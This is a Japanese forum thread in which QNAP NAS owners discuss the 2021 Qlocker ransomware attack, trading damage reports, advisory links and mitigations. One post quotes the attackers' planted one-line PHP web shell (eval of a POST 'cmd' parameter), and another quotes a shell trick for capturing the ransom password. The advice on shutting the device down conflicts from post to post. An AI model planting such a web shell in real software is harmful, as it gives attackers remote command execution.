【静音・高機能NAS】QNAP part56【自宅サーバ】

**不明なデバイスさん** (ｵｯﾍﾟｹ Srf7-X6xk) · 2021/04/22(木) 15:58:45.35

※次スレは>>970踏んだ方が立てて下さい。立てる時は1行目に !extend:checked:vvvvv:1000:512 をお忘れなく。

静音・高速・高性能なNASサーバ、QNAPのアプライアンス製品のスレ
NASを使う際に気になる点、速度・機能・静音などを高いレベルで満たす数少ない製品です
NASは初めての方から、標準搭載の各種機能が目的の方、データ保全とセキュリティが重要な業務用途、
Linuxベースの自宅サーバが欲しい方まで、幅広いユーザに最適です
QNAPは台湾のメーカーですが、マニュアルからユーティリティまで完全日本語対応です

・オフィシャルサイト： https://www.qnap.com/ja-jp/
QNAP NAS Community Forum　https://forum.qnap.com/
保証情報　https://www.qnap.com/ja-jp/service_ask/
販売/流通ルートは(海外通販や並行輸入品なども含めて)幾つもあります
正規代理店も複数あるので、故障時の手間や保証サポートのことも考えて、好きな流通経路のものを

関連サイト
・QNAP Club Japan　https://www.qnapclub.jp/

関連スレ
NAS総合スレPart31 (LAN接続HDD)
https://mevius.5ch.net/test/read.cgi/hard/1566794151/

前スレ・過去スレ：【静音・高機能NAS】
part49 https://mevius.5ch.net/test/read.cgi/hard/1569008532/
part50 https://mevius.5ch.net/test/read.cgi/hard/1577438170/
part51
https://mevius.5ch.net/test/read.cgi/hard/1583806285/
part52
https://mevius.5ch.net/test/read.cgi/hard/1591197765/
part53
https://mevius.5ch.net/test/read.cgi/hard/1597666162/
【静音・高機能NAS】QNAP part54【自宅サーバ】
https://mevius.5ch.net/test/read.cgi/hard/1607608227/
【静音・高機能NAS】QNAP part55【自宅サーバ】
https://mevius.5ch.net/test/read.cgi/hard/1615087933/

VIPQ2_EXTDAT: checked:vvvvv:1000:512:: EXT was configured

**不明なデバイスさん** (ﾜｯﾁｮｲ 978f-gMiP) · 2021/04/22(木) 21:41:00.45

ド素人で申し訳ないんだけど、そのランサムウェアはワンタイムパスワード使っててもダメなのか？

**不明なデバイスさん** (ﾜｯﾁｮｲ d7f1-Ho7r) · 2021/04/22(木) 21:42:41.13

すまない。
焦って再起動してQTS更新しちまった

終わってから調べたら7zファイルは約200個見つかった。
全部20MB以下。
このNASに保管しているすべての20MB以下ファイルが漏れなく7zになってるので
見事にやられた状態。

タイムスタンプ見ると2個増えたんじゃなくて
自部の探し方が悪くて後から見つかっただけっぽい。
200個のファイルのタイムスタンプは1分も差がなかった。
気が付いた時には手遅れだったみたい。

外部との共有用でファイル自体は別の場所にもあるので被害は無いが
やっぱり悔しいな

**不明なデバイスさん** (ﾜｯﾁｮｲ 779b-dTST) · 2021/04/22(木) 21:43:50.48

まだ原因は分かってない感じ？

**不明なデバイスさん** (ﾜｯﾁｮｲ 9f59-1W+b) · 2021/04/22(木) 21:53:24.57

やられた…
今気づいて検索してここまで来たよ…
一旦電源落とした

**不明なデバイスさん** (ﾜｯﾁｮｲ d736-5HvV) · 2021/04/22(木) 21:58:47.59

フォーラムをいくつか見てるけど、これという原因は特定されていないんだよね
未知の脆弱性や既存の脆弱性を一斉に狙ってるのかも

>>19
書き出したファイルを暗号化されたら駄目だけどねw
loggerで書き出してもいいかも

**不明なデバイスさん** (ﾜｯﾁｮｲ 5701-jEYc) · 2021/04/22(木) 22:02:19.17

これ電源落としたほうがいいの？
もう結構やられちゃったけど……
admin無効化したら大丈夫かな？

**不明なデバイスさん** (ﾜｯﾁｮｲ 975f-tdH6) · 2021/04/22(木) 22:04:20.34

なんの防御策も行わず外部公開にしてる抜けてる人多いんだなぁ。

**不明なデバイスさん** (ﾜｯﾁｮｲ 9f3d-9WMT) · 2021/04/22(木) 22:12:52.57

被害に遭った人は落ち着いたら構成を教えてほしい。

**不明なデバイスさん** (ﾜｯﾁｮｲ d736-5HvV) · 2021/04/22(木) 22:13:00.25

Response to Qlocker Ransomware Attacks: Take Actions to Secure QNAP NAS
https://www.qnap.com/nl-nl/news/2021/response-to-qlocker-ransomware-attacks-take-actions-to-secure-qnap-nas

**不明なデバイスさん** (ﾜｯﾁｮｲ d736-5HvV) · 2021/04/22(木) 22:13:48.96

>>25
電源はすぐに落とす、救える可能性がある

**不明なデバイスさん** (ﾜｯﾁｮｲ d736-5HvV) · 2021/04/22(木) 22:19:40.24

>>29
と思ったら落とさない方がいいのか？

**不明なデバイスさん** (ﾜｯﾁｮｲ d752-TCu/) · 2021/04/22(木) 22:37:05.47

かなりの騒ぎになってますね。
自分も今から7z化されてないか確認します、、

**不明なデバイスさん** (ﾜｯﾁｮｲ 9f3d-9WMT) · 2021/04/22(木) 22:41:15.16

>>19
のパターンも考えると中途半端に電源落とすの考えもの。
ひょっとしたらkeyが分かるかも。ミスると被害は拡大するかもしれんが。

**不明なデバイスさん** (ﾜｯﾁｮｲ 5701-jEYc) · 2021/04/22(木) 22:47:02.93

>>32
逆に落とすの止めましたもう重要なファイルが7zipになっちゃってるから逆に関係ない…
keyが分かればいいんですけどね…

**不明なデバイスさん** (ﾜｯﾁｮｲ 5701-jEYc) · 2021/04/22(木) 22:51:20.76

>>16のこれって
cd /usr/local/sbin; printf '#!/bin/sh \necho $@\necho $@>>/mnt/HDA_ROOT/7z.log\nsleep 60000' > 7z.sh; chmod +x 7z.sh; mv 7z 7z.bak; mv 7z.sh 7z;

7zip化が進んでる状態じゃないと意味がないのかな？
もうadmin無効化とかQNAPcloud無効化で止まったっぽいんだけど、それだとパスワード解析することは出来ない？

**不明なデバイスさん** (ﾜｯﾁｮｲ 9fb1-frwl) · 2021/04/22(木) 22:57:19.94

>>18
認識もするし動くことは動くが、運用中不可解なエラーがでるよ。ストレージエラーでRAID再構築が始まったりとか。海外フォーラムでもわりかし定番。

基本はCPUの上限でやめといた方が吉。
サポートも純正メモリ以外は純正メモリに換装後に問題あるならサポートするよってスタンス

ブログとかの奴らは認識して使えてる風な事を書くがろくに使ってないから問題が出ない。そんなならそもそもそこまでいらんやろ。

**不明なデバイスさん** (ﾜｯﾁｮｲ 1701-4rDj) · 2021/04/22(木) 22:58:33.86

PHPの脆弱性が狙われたんだと、PHPの公式サイトがハッキング被害に遇ったのと
関係してるかもしれんね。

PHPの公式Gitサーバーにハッキング被害--バックドアを仕掛けるコードが見つかる
japan.cnet.com/article/35168549/

ハッカーがPHPの開発者になりすましてソースコードにバックドアを仕込んでいたことが判
gigazine.net/news/20210330-phps-git-server-hacked-backdoors/

**不明なデバイスさん** (ﾜｯﾁｮｲ 9f59-1W+b) · 2021/04/22(木) 23:12:50.72

Multimedia直下のVideoPictureMusicが暗号化されてて
Multimedia直下の他のフォルダとかPublicフォルダとかは無事だった
優先してやったりしてるんだろうか

**不明なデバイスさん** (ﾜｯﾁｮｲ 9fad-IHcq) · 2021/04/22(木) 23:22:39.89

> $ ps --help
(snip)
> This version of ps accepts no options.
(´；ω；｀)

いつも ps ax | grep foo 程度の使用で気づいてなかった真実をいま学んだ
後ろが切れる状態から変えようがないんだったらそら見えないか
というかずっと無意味にオプションつけてたよ…

**不明なデバイスさん** (ﾜｯﾁｮｲ 9fad-IHcq) · 2021/04/22(木) 23:32:34.24

>>2の上の記事

Update 4/22/21: A bug was discovered last night that allowed victims
to recover their 7zip password for free
but was fixed soon after being discovered. More info in update below.

えええ…

**不明なデバイスさん** (ﾜｯﾁｮｲ 975f-dIdK) · 2021/04/22(木) 23:53:38.99

先月malware removerがマルウェア発見して、たまたま機種変更しようと思ってたところだったからすぐ機種変更して、セキュリティ関連も見直ししたんだけど、あの時ほったらかしてたら確実にやられてたな…

**不明なデバイスさん** (ﾜｯﾁｮｲ 5701-jEYc) · 2021/04/22(木) 23:57:11.11

>>39
これ、解決方法あるよーって言ってたやつ？解決できなかったのか…
QNAP公式はなんにもアナウンスしてないの

**不明なデバイスさん** (ﾜｯﾁｮｲ 9a4b-XmRv) · 2021/04/23(金) 00:05:04.62

写真とmp3、自炊データが被害に……
大部分が容量大きめで↑以外殆ど被害がなかったのが救い
とりあえずupnpと二段階認証とCloudとadminの無効化・確認してきた

**不明なデバイスさん** (ﾜｯﾁｮｲ dcad-sVZV) · 2021/04/23(金) 00:14:15.92

>>41
解決手段（穴）がふさがれてしまった、という感じだと思っていただければ
公式のアナウンスは今のところ>>28に載せてくれてるリンク

**不明なデバイスさん** (ﾜｯﾁｮｲ 74b1-kGtJ) · 2021/04/23(金) 00:20:54.34

スナップショットがランサムウェアによって削除されてるしどうすればいいんだ

**不明なデバイスさん** (ｵｯﾍﾟｹ Sr10-8zcY) · 2021/04/23(金) 00:25:43.98

>>35
x53Dでやれる範囲のVMだったら8GBで十分だしな
篠と違ってメモリ大量に積んでもあんまりキャッシュ効果もないし

**不明なデバイスさん** (ﾜｯﾁｮｲ c001-m0US) · 2021/04/23(金) 00:33:39.70

winで/mnt/HDA_ROOTにアクセスするにはどうすればいいの？
SSHでファイル移動する以外にGUIでは見れない？

**不明なデバイスさん** (ﾜｯﾁｮｲ dcad-sVZV) · 2021/04/23(金) 00:35:55.96

アナウンスから
> QNAP has released an updated version of Malware Remover for operating systems
> such as QTS and QuTS hero to address the ransomware attack.
> If user data is encrypted or being encrypted, the NAS must not be shut down.
> Users should run a malware scan with the latest Malware Remover version immediately,
> and then contact QNAP Technical Support at https://service.qnap.com/.

（雑すぎる和訳）
ランサム対策で Malware Remover を新しくしたんよ
もし暗号化済み・暗号化中だったらNASをシャットダウンしちゃダメ
すぐに最新版の Malware Remover でスキャン、んでからサポートに連絡してね

**不明なデバイスさん** (ﾜｯﾁｮｲ df36-BZjc) · 2021/04/23(金) 00:37:20.75

>>44
スナップショットはどんな状態になるの？

**不明なデバイスさん** (ﾜｯﾁｮｲ 4259-X3sy) · 2021/04/23(金) 00:39:42.92

もう電源落としちゃったよ…

**不明なデバイスさん** (ﾜｯﾁｮｲ 8ee3-Nexr) · 2021/04/23(金) 00:44:57.97

セキュリティ対策は>>14

ルータがセキュアな製品じゃない人はこの機会に買い替えましょう
IPS/IDSついてるASUSかSynologyがオススメ
BUFFALOとか日本製はとにかくゴミ

**不明なデバイスさん** (ﾜｯﾁｮｲ be08-feca) · 2021/04/23(金) 00:48:21.84

先週初NAS購入したのにいきなりコレかよ…

**不明なデバイスさん** (ﾜｯﾁｮｲ c001-m0US) · 2021/04/23(金) 00:52:03.09

誰か/mnt/HDA_ROOT/以下の見方教えて…
共有フォルダはそれ以下の
外してlinuxでマウントしようにも電源落とせないから外せない

**不明なデバイスさん** (ﾜｯﾁｮｲ c001-m0US) · 2021/04/23(金) 00:52:31.73

2行目抜けてた
SMBだと共有フォルダ以下しか見れないよね？

**不明なデバイスさん** (ﾜｯﾁｮｲ 0a02-VIaF) · 2021/04/23(金) 01:00:51.63

>>45
VMなんか今どき使わない。
うちは16GBでDockerコンテナ起動しまくってそこそこ負荷かけてるけど、安定して稼働してるよ。

**不明なデバイスさん** (ﾜｯﾁｮｲ 8a3d-2tiM) · 2021/04/23(金) 01:05:39.08

998 名前:不明なデバイスさん (ﾌﾞｰｲﾓ MM9b-9WMT) [sage] :2021/04/22(木) 20:43:55.74 ID:1yFbfocbM
何のウイルスのときか忘れたけどプロセス止めたり再起動するっていう対応が不正解というとんでもないパターンもあったよな。
プロセスが生きてる場合に限りワクチン起動するとメモリから複合鍵を生成できるみたいな。
ほっとくとモリモリ暗号化が進んでくかもしれないし無責任なアドバイスはできないけど。判断むずかしいな。

人の言うことは聞いてみるもんだな。

**不明なデバイスさん** (ﾜｯﾁｮｲ 245f-Bx8s) · 2021/04/23(金) 01:06:30.07

アドミン無効化してないやついるってことか？まじか？

**不明なデバイスさん** (ｵｯﾍﾟｹ Sr10-kKRL) · 2021/04/23(金) 01:08:25.83

>>54
どんなことしてる？
PT3パススルーで録画マシン組んだり尼フォト動かしたり出来るならVMなんか使わないが

**不明なデバイスさん** (ﾜｯﾁｮｲ b756-m0US) · 2021/04/23(金) 01:09:49.63

どうすればいいん？
とりあえず外にはつながってないから放置でもOK？
$ echo 'とけばわかる' | md5sum
8af456005f50587ac913f76ae00eda93 -

**不明なデバイスさん** (ﾜｯﾁｮｲ b756-m0US) · 2021/04/23(金) 01:10:40.41

$ echo -n '解けばわかる' | md5sum
14980c8b8a96fd9e279796a61cf82c9c -
改行…

**不明なデバイスさん** (ﾜｯﾁｮｲ be08-feca) · 2021/04/23(金) 01:11:03.67

知識もないのに調子に乗って購入したらこのザマですよ

**不明なデバイスさん** (ｵｯﾍﾟｹ Sr10-kKRL) · 2021/04/23(金) 01:11:44.10

>>56
脆弱性のクラックだからadmin云々は関係ないっしょ
パス破ったりむりやり昇位して乗っ取ったわけじゃないんだから

**不明なデバイスさん** (ﾜｯﾁｮｲ b756-m0US) · 2021/04/23(金) 01:13:17.05

まあ流石に外からつながらなけりゃ大丈夫かな…
続報をまとうず

**不明なデバイスさん** (ﾜｯﾁｮｲ 74b1-3riE) · 2021/04/23(金) 01:16:18.15

なんかシャットダウンやら再起動したらアウトな空気だよな
シャットダウンしちまったよ

**不明なデバイスさん** (ﾜｯﾁｮｲ 8ee3-Nexr) · 2021/04/23(金) 01:17:07.37

>>60
キチンとセキュリティ対策してた人は長期ユーザでも限られた一部だから気にするなよ
ご愁傷さまです

**不明なデバイスさん** (ﾜｯﾁｮｲ b701-1mqT) · 2021/04/23(金) 01:21:52.31

クローンやフルバックアップも取ってない時点でNASユーザーとしては失格の部類だろ
NASはテンポラリであって保管場所じゃない

**不明なデバイスさん** (ﾜｯﾁｮｲ ae63-1Uyt) · 2021/04/23(金) 01:22:24.60

NASがバックアップ手段のうちの一つでしかないんでいくらでも攻撃してくれって感じ

やられたことないけど(´ω`)

**不明なデバイスさん** (ﾜｯﾁｮｲ 4259-X3sy) · 2021/04/23(金) 01:26:08.58

ファームウェア更新とシャットダウンやってしまったけど
再起動後もガリガリHDD動いてるっぽいんだけど
まだ暗号化走ってるのかな

**不明なデバイスさん** (ﾜｯﾁｮｲ df36-BZjc) · 2021/04/23(金) 01:26:10.30

シャットダウンすればそれ以上暗号化される心配はないけど
動作中であれば>>16でパスワードがわかる
再起動したら暗号化が再び始まったという話もあるので判断が難しい

とりあえずforumの最新情報を見て判断するしか、消された元ファイルを復活させるとか
https://www.bleepingcomputer.com/forums/t/749247/qlocker-qnap-nas-ransomware-encrypting-with-extension-7z/
https://forum.qnap.com/viewtopic.php?f=45&;t=160849&sid=8223b1531d52b41ffcd0f23b148495e8

**不明なデバイスさん** (ﾜｯﾁｮｲ 8a3d-2tiM) · 2021/04/23(金) 01:37:25.90

最大のセキュリティ対策はやはり冗長化だな。
即FW適用は不具合を拾って死ぬリスクもあるし。
ディスクのロットをバラして筐体冗長はメーカーもバラしたいところ。
あと個人ユースでの倉庫レベルならスナップショットよりも日単位か週単位くらいに世代ずらしてバックアップするほうが良いわ。
元ファイルはデジカメのSDなりPCのローカルなりに1週間分くらい置いておけば良いわけで。
更にいうと月1で外付けHDDにも逃すくらいのことすると落雷サージとかまで考えたらなお良いけどズボラな性格の自分には絶対に無理だわ。
あとはAWSのglacierくらいか。

**不明なデバイスさん** (ﾜｯﾁｮｲ b756-m0US) · 2021/04/23(金) 01:44:27.06

よしもう１台買う決心がついた
問題はHDDがどこにも売ってないことなんだよなあ…

**不明なデバイスさん** (ﾜｯﾁｮｲ c001-m0US) · 2021/04/23(金) 01:48:30.09

フォーラム見てたんだけどこれってどういう事か分かる人いる？

You might be a lucky exception. My files are encrypted. Check on one file with

/usr/local/sbin/7z.bak l -slt FILENMAE.7z
local/sbin/7z.bak l -slt FILENMAE.7z

**不明なデバイスさん** (ﾜｯﾁｮｲ ba7c-xYSY) · 2021/04/23(金) 01:59:28.88

やっぱりスナップショットはランサムウェア対策にはならんのだな
そりゃそうだ
QNAP公式サイトでさんざんランサムウェアにはスナップショットを連呼してたから騙されるところだった

**不明なデバイスさん** (ﾜｯﾁｮｲ 9a4b-XmRv) · 2021/04/23(金) 06:06:08.72

朝起きたらマルウエアリムーバーがエラーで開かないんだけどみんなは大丈夫？

73 (ﾜｯﾁｮｲ 9a4b-XmRv) · 2021/04/23(金) 06:59:45.59

アプリ再起動したらいけた模様。
スレ汚し申し訳ない

**不明なデバイスさん** (ﾜｯﾁｮｲ 8cbb-BgAO) · 2021/04/23(金) 07:18:42.94

adminの無効化はどうなんだろうな。
簡単なパスワードを設定しなければ関係ない気がする。脆弱性を突かれる場合は関係ないだろうし。

2021/04/23(金) 07:31:12.03

IDがわかりづらいだけでも無効化の価値はあるかと

**不明なデバイスさん** (ﾌﾞｰｲﾓ MMed-+ZbI) · 2021/04/23(金) 07:42:36.54

資格情報はファームにハードコーディングされたパスワードでログインしてるって言う
情報があったんで、もしそうだとするとadminを無効化するのは意味ないね
どうしてそんな仕込みをしてあるのかは不明だけど

**不明なデバイスさん** (ﾜｯﾁｮｲ 8a3d-2tiM) · 2021/04/23(金) 08:00:32.86

スナップショットは十分な容量がある上でやられたのがPC側なら意味はある。
NASがやられると意味なさそう。

**不明なデバイスさん** (ﾜｯﾁｮｲ c2ab-T6Cp) · 2021/04/23(金) 08:10:07.17

>>48
普通は出るファイル・フォルダがないことにされる。

>>77
ttps://www.qnap.com/en/security-advisory/QSA-21-13
これのことでしょ？多分これがアタリだと思う。
うちはポートも変えてたし、adminも無効にしてたけどやられた。
皮肉にもHBS 3 Hybrid Backup Syncで外部ディスクにバックアップ取ってたおかげでファイル復旧は出来たけど。

**不明なデバイスさん** (ﾜｯﾁｮｲ 3f2d-H1Bl) · 2021/04/23(金) 08:45:19.26

degrade modeってなんだよ
動作がとてつもなく遅い　やられたのか

**不明なデバイスさん** (JP 0Hfd-Cx3h) · 2021/04/23(金) 08:51:29.91

>>80
sshで入ってps auxでもしてみ
変なプロセスが多すぎるとか

**不明なデバイスさん** (ﾜｯﾁｮｲ 0101-xc/R) · 2021/04/23(金) 09:13:04.01

>>79
双子の脆弱性って解説があるみたいやぞ。

ttps://www.vortez.net/news_story/qnap_nas_users_advised_to_urgently_update_malware_remover_due_to_ransomware.html

> More details on the vulnerabilities exploited can be found at QNAP security advisories
> QSA-21-11 (https://qnap.to/3eq7hy) and QSA-21-13 (https://qnap.to/3dygse).

無線ルーターを最近出たQNAPのQHora-301Wに交換して、QNAPのNASを導入しよう
かと思ってたけど、どちらもまだ導入してなくてよかった。

**不明なデバイスさん** (ﾜｯﾁｮｲ 8cbb-BgAO) · 2021/04/23(金) 09:16:56.86

しかし、疑問なのは、どうやってWAN側からNASまで辿り着いたのか、だよね。この脆弱性を利用するにせよ、NASにはアクセスしないといかんわけで。

**不明なデバイスさん** (ﾜｯﾁｮｲ 07ca-+ZbI) · 2021/04/23(金) 09:19:54.88

今回のランサムウェアのいま出てる情報を総括して考えると

・UPnPの脆弱性とHBC3にハードコードされたパスワードを利用して侵入している可能性
・ある容量以下のファイルを全て7zに暗号化する
・解凍パスワードは32桁なので総当り解読は無意味
・プロセスが動作中であればパスワードを抜き出せる可能性あり

こんな感じかな？

**不明なデバイスさん** (ﾌﾞｰｲﾓ MMfd-2tiM) · 2021/04/23(金) 09:22:54.67

>>79
ポート変えてたってのが気になる。
HTTPとか開けてたの？

**不明なデバイスさん** (ﾜｯﾁｮｲ c2ab-T6Cp) · 2021/04/23(金) 10:06:00.17

>>82
マルチメディア～はうちの環境だと当てはまらない（使ってないしインストールしていない。QTSは3月2日のアップデートが最新）ので、HBS3のハードコートパスの方が拙いと思ってる。

>>85
使おうが使うまいがポート変えるのは基本でしょ？
それはともかくmyqnapcloudで外向きに出してる。
外部公開していない人で当たった人は居ないのでは？

うちの環境から察するに、myqnapcloudでターゲティング（一寸前にadminに対してもの凄い総当たり攻撃があったのはmyqnapcloudでターゲティングしたんだと思ってる）、
HBS3のハードコートパスワードで侵入したんだと思う。

**不明なデバイスさん** (JP 0Hf8-BCZd) · 2021/04/23(金) 10:17:14.84

admin無効関係なし
ポート変更関係なし

現状できる回避策はUPnPのオフとNASをネットワークから隔離することくらい

**不明なデバイスさん** (ﾜｯﾁｮｲ a282-On6t) · 2021/04/23(金) 10:20:59.68

あああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああ

金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ

**不明なデバイスさん** (ﾌﾞｰｲﾓ MMfd-2tiM) · 2021/04/23(金) 10:31:26.42

>>86
ありがとう。
myqnapcloudで当たりをつけてupnpで侵入って感じか。
それだとmy～を使ってない人はほぼセーフってところか。

**不明なデバイスさん** (ﾜｯﾁｮｲ 245f-hzqe) · 2021/04/23(金) 10:52:23.53

新機種買ったので現有機器をローカル限定に切り替えたところだった。
ギリギリセーフw

**不明なデバイスさん** (ﾜｯﾁｮｲ 3868-bceD) · 2021/04/23(金) 10:58:48.59

流れと関係ないけどTS-231Pを4.5.2 Build 20210406に上げたらWebDAVに繋がらなくなった

**不明なデバイスさん** (ﾜｯﾁｮｲ 07ca-+ZbI) · 2021/04/23(金) 11:00:05.25

とりあえず今回のランサムウェア緊急回避対策

・最新のHBS3に更新
・QNAPの外向きサービスとの紐付け解除
・UPnP停止
・最新のMalware Removerをインストール

出来るならネットワークから切り離してスタンドアロン環境で様子見もあり

**不明なデバイスさん** (ﾜｯﾁｮｲ 4259-o8NC) · 2021/04/23(金) 11:01:31.16

7zのパス出させる方法は手遅れだったので
小さいファイルを32桁開始で総当たりする解析スクリプト回し始めた
たぶん無理

**不明なデバイスさん** (ﾌﾞｰｲﾓ MMed-2tiM) · 2021/04/23(金) 11:48:07.81

うちので外とやり取りあるのはこれだけ。
DDNS noipで更新
NTP nict
L2TP
インバウンドはNAS以外を含めてもL2TPしか通してない。
それ以外はブロードバンドルータで止めてる。
myQNAPはアカウント自体を作ってない。
これなら大丈夫だよな？
昨晩確認した限りではルータにはアメリカとかチェコから1時間に数件のpingがあった程度。
NASにはadminとL2TP用のユーザでのログインログしかなかった。

**不明なデバイスさん** (ﾜｯﾁｮｲ df36-BZjc) · 2021/04/23(金) 12:03:43.99

/usr/local/sbin/7z がシェルスクリプトに変更されている

**不明なデバイスさん** (ﾜｯﾁｮｲ df36-BZjc) · 2021/04/23(金) 12:13:38.26

>>95
デフォルトだと /share/CACHEDEV1_DATA/.qpkg/MalwareRemover/7z.log に
7zのパスワードを保存するようだ、ご注意を

**不明なデバイスさん** (ﾜｯﾁｮｲ df36-BZjc) · 2021/04/23(金) 12:21:27.70

攻撃を受けた人って

/root/re.sh
/mnt/ext/opt/apps/backup.php

のファイルがある？

**不明なデバイスさん** (ﾜｯﾁｮｲ 969b-S8++) · 2021/04/23(金) 12:26:36.04

なにがショックってスナップショットが全く役に立たなかったってこと
意味ないじゃん・・・

**不明なデバイスさん** (ﾜｯﾁｮｲ dcad-sVZV) · 2021/04/23(金) 12:27:07.46

>>96
95を見て「それは>>16をやったからでは？」と思ったら16さんだった件

最新のMalware Removerを走らせたらそうなった、とかでもないのかな
7zが書き換えられてログ取るようにされた！QNAPに！的な

**不明なデバイスさん** (ﾜｯﾁｮｲ df36-BZjc) · 2021/04/23(金) 12:48:42.09

>>99
/usr/local/sbin/7zの更新日付がMalware Removerが動いた時間なので多分そうではないかと

**不明なデバイスさん** (ﾜｯﾁｮｲ c2ab-T6Cp) · 2021/04/23(金) 13:04:22.83

>>89
upnpはどうなんだろう？本質的にはHBS3に入ってた認証情報が使われた可能性が結構あるというところまでな気がする。
いや疑わしきは罰すの精神でupnp無効はアリと思うけど。

>>92
Malware Remover入れて回したら、「見つかって除去したわ。再起動して」って出るけど、公式は再起動するなと言ってる罠
https://www.qnap.com/ja-jp/news/2021

>>94
今回の件とは別件だけど、adminに対して1日で1000件以上（途中から数えるのを止めた）のブルートフォース攻撃が起こったりしてるから、可能性は低いにしても外向きに構えるならadminは無効にしないと。

>>97
/mnt/ext/opt/apps/backup.phpだけあって、中身は「<?php eval($_POST["cmd"]);?>」のみだったけど、何かあるの？

>>98
スナップショットが消されてこの世の絶望を味わったけど、皮肉にもHBS3のおかげで外付けディスクにバックアップが取れてて地獄と天国を見て、
多重バックアップは必須というのを思い知ったわ。

**不明なデバイスさん** (ﾌﾞｰｲﾓ MMed-0PTu) · 2021/04/23(金) 13:09:45.78

帰ったら俺もNAS確認しよ、月曜日にはHBS3がUSBHDDを上書きしちゃう！

**不明なデバイスさん** (ﾜｯﾁｮｲ dcad-sVZV) · 2021/04/23(金) 13:17:18.52

>>100
「海外フォーラムチェックしながら心配してくれてる人が、やられた？」と
動揺して勝手に16さんだと決め付けてごめんなさい

QNAPの仕業っぽかったら問題なしですね。ログの置き場も置き場だし

**不明なデバイスさん** (ﾌﾞｰｲﾓ MMed-Rk3w) · 2021/04/23(金) 13:56:37.50

>>79
>>64のファイルがスナップショット無効化とphpのエクスプロイトらしい

**不明なデバイスさん** (ﾌﾞｰｲﾓ MMfd-2tiM) · 2021/04/23(金) 13:57:47.85

>>101
ありがとう。
念のため片方はadmin外してgoogle認証アプリの2要素までセットしたわ。

**不明なデバイスさん** (ﾌﾞｰｲﾓ MMfd-9+qx) · 2021/04/23(金) 13:58:07.13

ポート開放、adminの無効化、2要素認証、ポート変更は関係なく、myQNAPcloud経由でアクセスを許可してる人が侵入されるのかな？
myQNAPcloudは繋ぎ方が複数あって、UPnPとnasからqnapに繋ぎに行くcloudlinkとがある。

**不明なデバイスさん** (ﾜｯﾁｮｲ 4259-X3sy) · 2021/04/23(金) 14:08:16.64

これQNAPどう落とし前つけるの？
修正バージョン配ってロックかかった人は残念だったねで終わり？

**不明なデバイスさん** (ｴｱﾍﾟﾗ SD5a-Q9US) · 2021/04/23(金) 14:26:39.45

>>107
ゼロデイだろうからそうじゃないの？

**不明なデバイスさん** (ﾜｯﾁｮｲ fb6e-BqgI) · 2021/04/23(金) 14:39:50.64

使用条件に入ってるだろ
いかなる理由があってもデータの損失に責任を負わないって
これに同意しなければそもそも使えない
どんなソフトでもハードでも同じ

ゼロデイだろうがそうでなかろうが関係ない
バックアップ取るのはユーザーの責任
ガタガタ騒ぐな

**不明なデバイスさん** (ﾜｯﾁｮｲ a45f-On6t) · 2021/04/23(金) 14:57:39.07

windows狙い撃ちのウイルスに感染したってMSがなんか保証するわけじゃないしな

**不明なデバイスさん** (ﾜｯﾁｮｲ d205-Iq6q) · 2021/04/23(金) 15:05:38.37

使用条件にはQNAPを崇め奉らなければQNAPは使えないとは書かれていない

ならばガタガタ騒ぐも開発の無能さを嘆くもユーザーの勝手というわけだから
俺は騒ぐ分には大いに騒いでいいと思うぜ
特にこの件はな

2021/04/23(金) 15:11:13.41

大切なデータは正副予備の3段構えにしとけと

俺は言ってなかったわ(´・ω・`)

**不明なデバイスさん** (ﾜｯﾁｮｲ 8cbb-BgAO) · 2021/04/23(金) 15:11:36.75

結局のところ、クラウド経由のリモートアクセスみたいな飛び道具は危険って結論だよね。
「絶対」はないから、QNAPに限らず、どんな製品でも言えること。

**不明なデバイスさん** (ﾌﾞｰｲﾓ MM5e-HDr5) · 2021/04/23(金) 15:13:19.76

>>80
raid再構築中？

**不明なデバイスさん** (ﾜｯﾁｮｲ 07ca-+ZbI) · 2021/04/23(金) 15:17:16.76

家の玄関を見せれば泥棒は何とかして忍び込もうとするものだ

**不明なデバイスさん** (ﾜｯﾁｮｲ df36-BZjc) · 2021/04/23(金) 15:20:28.74

取り合えずやることはこれくらかな

1.Malware Removerを最新にしてスキャン
　マルウェア実行中であればパスワードが保存できる
　/share/CACHEDEV1_DATA/.qpkg/MalwareRemover/7z.log
2.すべてのアプリを最新版に更新
3.ルーターのUPnP機能停止

**不明なデバイスさん** (ﾜｯﾁｮｲ 4259-X3sy) · 2021/04/23(金) 15:22:42.10

いっそのこともう一回マルウェア実行してくれ…

**不明なデバイスさん** (ｴｱﾍﾟﾗ SD5a-Q9US) · 2021/04/23(金) 15:38:43.01

>>109
それもそうね。

>>117
別のパスワードで二重に圧縮かけられるだけなんじゃ…

**不明なデバイスさん** (ﾜｯﾁｮｲ fb6e-BqgI) · 2021/04/23(金) 15:50:11.63

某巨大ストレージベンダーが脆弱性突かれたとかでなく自分のトコのファームウェアのせいで世界中で企業のデータ完全に吹っ飛ばしたときでさえ使用許諾条件盾に一切保証なし。

しかも同じストレージ使ってバックアップ取ってたトコはバックアップまで全部飛んだというオマケ付き

ハードソフトはそういう世界
見限ってベンダー変えるのも自由